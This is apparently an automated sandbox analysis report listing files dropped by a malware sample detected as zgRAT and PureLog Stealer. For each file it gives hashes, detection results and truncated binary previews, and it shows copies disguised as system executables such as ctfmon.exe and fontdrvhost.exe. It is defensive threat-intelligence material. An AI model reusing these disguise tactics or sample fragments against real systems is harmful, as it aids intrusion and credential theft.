                                                                                                                SHA-256:7DC0B80B76BCAB171FD485BB3A1E7881E51614409BFD8553C323AA78F150B179
                                                                                                                SHA-512:B79E25CAC0EA1B1096092352412C91150D173B84C9FE3831B1089CA68876D3EA3631A256A9AB99CBDCFD8B5DC8297A6A9E258852E381870C5FD646F3F74BD6BB
                                                                                                                Malicious:false
                                                                                                                Preview:YoqxtdZ7aJZgk30mCP1n1NndC0NSzIU9txzwelyiHqaFTwJa8mhyE8iLBMv3QHISzZxxDEHbbSgLxiKQqxUMlf5uPovR05SAiHP38WW3eFWvcXXcCfMcw5rUeDhZT0kgAgmpSRRUbasfIKS2QSOVszNma5Y5z6kne0v6usJvN1BWNMLUuoIAmPxKSAPX2Vee0EASZWIiIdH1x1YOuEKKyjBPCknucw22WhfJL25Ygj2JI6WblAmyKUpRCvQytXFVkPePVPC2JwoOq2GFNLIbKErC2NHalGpIdgi2cGFW8uoYqalJoKlhPoLfibXIHlQDGfvKTNmGFwdZZSWbm7waeH3zUDUBt7OXelRKpazaifccKwGPF5fKzzi9l5zQ2lXHhG4xALwLHV29paoi7F5xbEhpDSjtljh6IU5E1SO3J

                                                                                                                C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1998336
                                                                                                                Entropy (8bit):7.561504801735127
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:S1cKuEoW9iN0TvOJcaCXMgg2Suqp6Nheem6Vuuean7WiOLYGhYJG9oQpyhctpnWq:wb24KbkglgVMm9OAG9oMgctpnW5yI4
                                                                                                                MD5:2D756772BC00E5778D794C107358DDF7
                                                                                                                SHA1:77229FC9CEEB137C6644A4FA3085AECABAF94EC3
                                                                                                                SHA-256:A7F4C48301AD6B01C8777427EACEB965A9E0C14D493F44D1DEA4F8D498123469
                                                                                                                SHA-512:31FAE1A50618ED221CEF3BFC72A017E8E925C3AA2BAC727040EE655D9DFF567813E91D76FECDA0478653D50B8061481447DED77939B94E1EC823C3419B68C783
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.3g.................v............... ........@.. ....................................@.................................@...K....... ............................................................................ ............... ..H............text....t... ...v.................. ..`.rsrc... ............x..............@....reloc...............|..............@..B................p.......H...........4...........0...{............................................0..........(.... ........8........E....q...M.......)...8l...(.... ....~....{....9....& ....8....(.... ....~....{r...9....& ....8....(.... ....~....{....:....& ....8z...*...0.......... ........8........E....f...=...............1...8a.......~....(X...~....(\... ....<.... ....8....r...ps....z*~....:.... ....~....{i...9....& ....8}......... ....~....{....9c...& ....8X...8.... ....~....{....:?...& ....84...~.

                                                                                                                C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe:Zone.Identifier

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):26
                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                Malicious:true
                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\CSC80740084700441B098BDC166533478DB.TMP

                                                                                                                Download File
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                File Type:MSVC .res
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1168
                                                                                                                Entropy (8bit):4.448520842480604
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                                                                MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                                                                SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                                                                SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                                                                SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                                                                Malicious:false
                                                                                                                Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                                                Download File
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4608
                                                                                                                Entropy (8bit):3.9013554994428823
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:6Gmtt6xZ8RxeOAkFJOcV4MKe28dpavqBHHuulB+hnqXSfbNtm:UVxvxVx9Javk5TkZzNt
                                                                                                                MD5:0F548165DDBB16E3FA4AABB0F03B7318
                                                                                                                SHA1:05E18D1B30C11E6AEE1CFF1C276A587BFA0AA117
                                                                                                                SHA-256:026B55AF9F3078D528414EA98BDC4EBE085F4B67978695F94B510D81D204FB8B
                                                                                                                SHA-512:F7A25283B5A114C2BADBC995957B551572DEB6C04A4B9E4EC2DDF39182080EBEEE30649070D63271F1F875DE105F5E20BBA0505C7A28D7F6C087CA479BD9068A
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7.;g.............................'... ...@....@.. ....................................@.................................D'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!................................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                                                                C:\Program Files\Microsoft Office 15\ClientX64\5b884080fd4f94

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with very long lines (490), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):490
                                                                                                                Entropy (8bit):5.856004214856076
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:kflh4cSsZI+spp9nNbCLGMykZknSRYjL7dnUXaDFb0W4:ilHwp9NbCL7ZknSmUqI
                                                                                                                MD5:6463DBA329B47301B3E44296280EDA8C
                                                                                                                SHA1:FF3F062725197185AEC67F79495F5EE4A7209CC5
                                                                                                                SHA-256:36DD8BB0BEBBF2E6E0950A3BEB8C716635D141FF8F36BE922FB75BD4D4E5F4ED
                                                                                                                SHA-512:36EA86FED86B5DD904F2CBC8D3DA2DF58265E78CD974591621E7AE531B76D5AC6748F64CDDB2F4531A42C986D3B09258F62AE6E00EC67E7BD8B76344CE6F3FF0
                                                                                                                Malicious:false
                                                                                                                Preview:nHlDPLJDKKwEcUAQtxLXTqZkd2bLF7Ei2eIbZhvPCkQ1wumCF5YnG9K6sAjWu87MGNM8Mj0LC5VtZhytQYFKibc2ULsZ8YfDnDviho0fENkKobhKLzGV2xoovUnB0bMnaRFVwPMlhjFV0SN2nhNISJL0ZGxMAzomA7tXVLY5neySrSycGvXTOEVQGP5pcAls5cV3i0hbJRfxV2JHSUFPcVY5mcRGQsdn2GXO653PN5J6jh5NGyXI4WQjEZQGjaLay14Pe4LXazBgMbWEgDAcUVtg0yKgoxqxusIrmqtLnArEVtXmCMjgatFdIYYptosmJOwdSpb0TyyUnoLGbhecOKXAmpiORDb8RE4H74TWutMl4vzdNSOMJQY90v0nHMiPW0CiuDIhNHrf7vF1zEB9zPzBq5QMDqPhK7OEtRtJKr8Cj2CEp9xDLjaGAB2yx6dh2JUAhBIiU2yHRwbx3LgE2LWlgHDrY5VNOaKZhCho0P

                                                                                                                C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1998336
                                                                                                                Entropy (8bit):7.561504801735127
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:S1cKuEoW9iN0TvOJcaCXMgg2Suqp6Nheem6Vuuean7WiOLYGhYJG9oQpyhctpnWq:wb24KbkglgVMm9OAG9oMgctpnW5yI4
                                                                                                                MD5:2D756772BC00E5778D794C107358DDF7
                                                                                                                SHA1:77229FC9CEEB137C6644A4FA3085AECABAF94EC3
                                                                                                                SHA-256:A7F4C48301AD6B01C8777427EACEB965A9E0C14D493F44D1DEA4F8D498123469
                                                                                                                SHA-512:31FAE1A50618ED221CEF3BFC72A017E8E925C3AA2BAC727040EE655D9DFF567813E91D76FECDA0478653D50B8061481447DED77939B94E1EC823C3419B68C783
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.3g.................v............... ........@.. ....................................@.................................@...K....... ............................................................................ ............... ..H............text....t... ...v.................. ..`.rsrc... ............x..............@....reloc...............|..............@..B................p.......H...........4...........0...{............................................0..........(.... ........8........E....q...M.......)...8l...(.... ....~....{....9....& ....8....(.... ....~....{r...9....& ....8....(.... ....~....{....:....& ....8z...*...0.......... ........8........E....f...=...............1...8a.......~....(X...~....(\... ....<.... ....8....r...ps....z*~....:.... ....~....{i...9....& ....8}......... ....~....{....9c...& ....8X...8.... ....~....{....:?...& ....84...~.

                                                                                                                C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe:Zone.Identifier

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):26
                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                Malicious:true
                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                C:\Recovery\26c12092da979c

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with very long lines (319), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):319
                                                                                                                Entropy (8bit):5.794551103887065
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:DVPY1QWYg6N0BxBLlIMPCgPihYe186pA23s3thtEpaisvtVN84:DS1DQmBx96WshYexpAX3thmT+s4
                                                                                                                MD5:E20D1869DE8A5A6D7449B13B97C59C92
                                                                                                                SHA1:69290D184BECBF644CE9E78BBB1B17BA2B9E0DDA
                                                                                                                SHA-256:49D284749BB7BB78180720C7E5E543FB90BB4E8A88F0D104D64240535AA04630
                                                                                                                SHA-512:63D106931839D0B3288700D2682D24FA8A15B4FE4F227BB6A5C3B1BCAE50C28C80AA36365B8EBC2635D1D34F5A9C0EAECA184C372C582137EEB90A7D36244F0E
                                                                                                                Malicious:false
                                                                                                                Preview:LQQTxpjpdiPusmCjiy61Vfkro0BnHCEsd9XdVPtQiobglhgRGudpAr8pqjo7n5ibdhQsOjOTEqSqDEFHTugXiZsvBsxvkwmmGACEQyDhfKlTZRlldhn3ZL2EyerfwdsRDqkDCB0fr91YyYWuGLRDJsN5I7PvGhvCbTQtqijcqHMZTeQaI7ZkLoIUcp5EwEYJOz6eInDilzWBgxlnrynJHK0xL5QAnfpltCLehvRe319WRHyoERX7aPBD8JTNWD4GJuSelHG5gJQQLdfDHl6WIsLdAIfYcEH062NhzUC6LbaR9v2eoPFvGi7ajyddlrc

                                                                                                                C:\Recovery\94dd0fcc3d3f01

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):266
                                                                                                                Entropy (8bit):5.8145612008866125
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:0FdD8ReexHLEk8LXUGsDAlk6eaqCQsDq02CvwdEj82zul0h982XzA:0oPLN8jU42D+qNCabkuyh6wzA
                                                                                                                MD5:AB7ABAE77CBD9E44E612AF0AA9F2E606
                                                                                                                SHA1:1B29011B875525CF1AD2C14A2080F4D9CD7665B8
                                                                                                                SHA-256:544DF33A1780215E70320BA6B4BA03034AA36216D5CBB5A8C01A3D5C66F8D02A
                                                                                                                SHA-512:A01D38844F829EE5EBBB9B5A89BD56B2A278F7A8ED7F8F51064B8A2FA2E28F470D53AA2DDACD1A975898CC3A1960011D79FBE16A346B5C459ADEF0960C8296FA
                                                                                                                Malicious:false
                                                                                                                Preview:7Oxi9LqR3ePQAuM9WtY4w7A0jVd88QjajOqASMHXRJqTONk7Pcpq6YdAN69nrsSn4yqwDMqJmBnnRrlVvfsfk3eLvpwVMdpj0CYZgy4DwfE5uztgUo2M9xCBTfAXZU7IVExOSMy6lptFzja66PAikcjD9XGAxgobi5jqBfOIz6kUD7MuFEbJUYi2euO4FyJFBSg3At4aB1to2P9CLV5tEeHJXqLRRUCAxeTvaSuVKBIco4APuLtu2aBgKWgThmJrzs1X6Ol2lj

                                                                                                                C:\Recovery\ctfmon.exe

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1998336
                                                                                                                Entropy (8bit):7.561504801735127
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:S1cKuEoW9iN0TvOJcaCXMgg2Suqp6Nheem6Vuuean7WiOLYGhYJG9oQpyhctpnWq:wb24KbkglgVMm9OAG9oMgctpnW5yI4
                                                                                                                MD5:2D756772BC00E5778D794C107358DDF7
                                                                                                                SHA1:77229FC9CEEB137C6644A4FA3085AECABAF94EC3
                                                                                                                SHA-256:A7F4C48301AD6B01C8777427EACEB965A9E0C14D493F44D1DEA4F8D498123469
                                                                                                                SHA-512:31FAE1A50618ED221CEF3BFC72A017E8E925C3AA2BAC727040EE655D9DFF567813E91D76FECDA0478653D50B8061481447DED77939B94E1EC823C3419B68C783
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\ctfmon.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ctfmon.exe, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.3g.................v............... ........@.. ....................................@.................................@...K....... ............................................................................ ............... ..H............text....t... ...v.................. ..`.rsrc... ............x..............@....reloc...............|..............@..B................p.......H...........4...........0...{............................................0..........(.... ........8........E....q...M.......)...8l...(.... ....~....{....9....& ....8....(.... ....~....{r...9....& ....8....(.... ....~....{....:....& ....8z...*...0.......... ........8........E....f...=...............1...8a.......~....(X...~....(\... ....<.... ....8....r...ps....z*~....:.... ....~....{i...9....& ....8}......... ....~....{....9c...& ....8X...8.... ....~....{....:?...& ....84...~.

                                                                                                                C:\Recovery\ctfmon.exe:Zone.Identifier

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):26
                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                Malicious:true
                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                C:\Recovery\fozAQGvSmfTQIywuzSgk.exe

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1998336
                                                                                                                Entropy (8bit):7.561504801735127
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:S1cKuEoW9iN0TvOJcaCXMgg2Suqp6Nheem6Vuuean7WiOLYGhYJG9oQpyhctpnWq:wb24KbkglgVMm9OAG9oMgctpnW5yI4
                                                                                                                MD5:2D756772BC00E5778D794C107358DDF7
                                                                                                                SHA1:77229FC9CEEB137C6644A4FA3085AECABAF94EC3
                                                                                                                SHA-256:A7F4C48301AD6B01C8777427EACEB965A9E0C14D493F44D1DEA4F8D498123469
                                                                                                                SHA-512:31FAE1A50618ED221CEF3BFC72A017E8E925C3AA2BAC727040EE655D9DFF567813E91D76FECDA0478653D50B8061481447DED77939B94E1EC823C3419B68C783
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.3g.................v............... ........@.. ....................................@.................................@...K....... ............................................................................ ............... ..H............text....t... ...v.................. ..`.rsrc... ............x..............@....reloc...............|..............@..B................p.......H...........4...........0...{............................................0..........(.... ........8........E....q...M.......)...8l...(.... ....~....{....9....& ....8....(.... ....~....{r...9....& ....8....(.... ....~....{....:....& ....8z...*...0.......... ........8........E....f...=...............1...8a.......~....(X...~....(\... ....<.... ....8....r...ps....z*~....:.... ....~....{i...9....& ....8}......... ....~....{....9c...& ....8X...8.... ....~....{....:?...& ....84...~.

                                                                                                                C:\Recovery\fozAQGvSmfTQIywuzSgk.exe:Zone.Identifier

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):26
                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                Malicious:false
                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\LzmJLVB41K.exe.log

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2126
                                                                                                                Entropy (8bit):5.371983462188659
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs1H1HzHKlT4vHNpYHKD:iqbYqGSI6oPtzHeqKkt1wmj1VTqZ4vtD
                                                                                                                MD5:1BD67CFCD59AB1D751AC79E730FCC39B
                                                                                                                SHA1:F2BDE903A17C7A716D955EBA328042E10418285F
                                                                                                                SHA-256:EACD23C8D5669C5D732A40218B7F3D6C9ABB0D5E782AD2EC10BB71C1CC2E8B6C
                                                                                                                SHA-512:9FF050AB37C8E572A5D185F9A9F7E2A8076D7D64FDE7D14215302DFDFB6CE530327145B47C420AAF2BBDABA7187B0DE19357AD4C294F0B9EFD5F6ADB42DE353F
                                                                                                                Malicious:true
                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT

                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ctfmon.exe.log

                                                                                                                Download File
                                                                                                                Process:C:\Recovery\ctfmon.exe
                                                                                                                File Type:CSV text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):847
                                                                                                                Entropy (8bit):5.354334472896228
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                Malicious:false
                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fontdrvhost.exe.log

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe
                                                                                                                File Type:CSV text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):847
                                                                                                                Entropy (8bit):5.354334472896228
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                Malicious:false
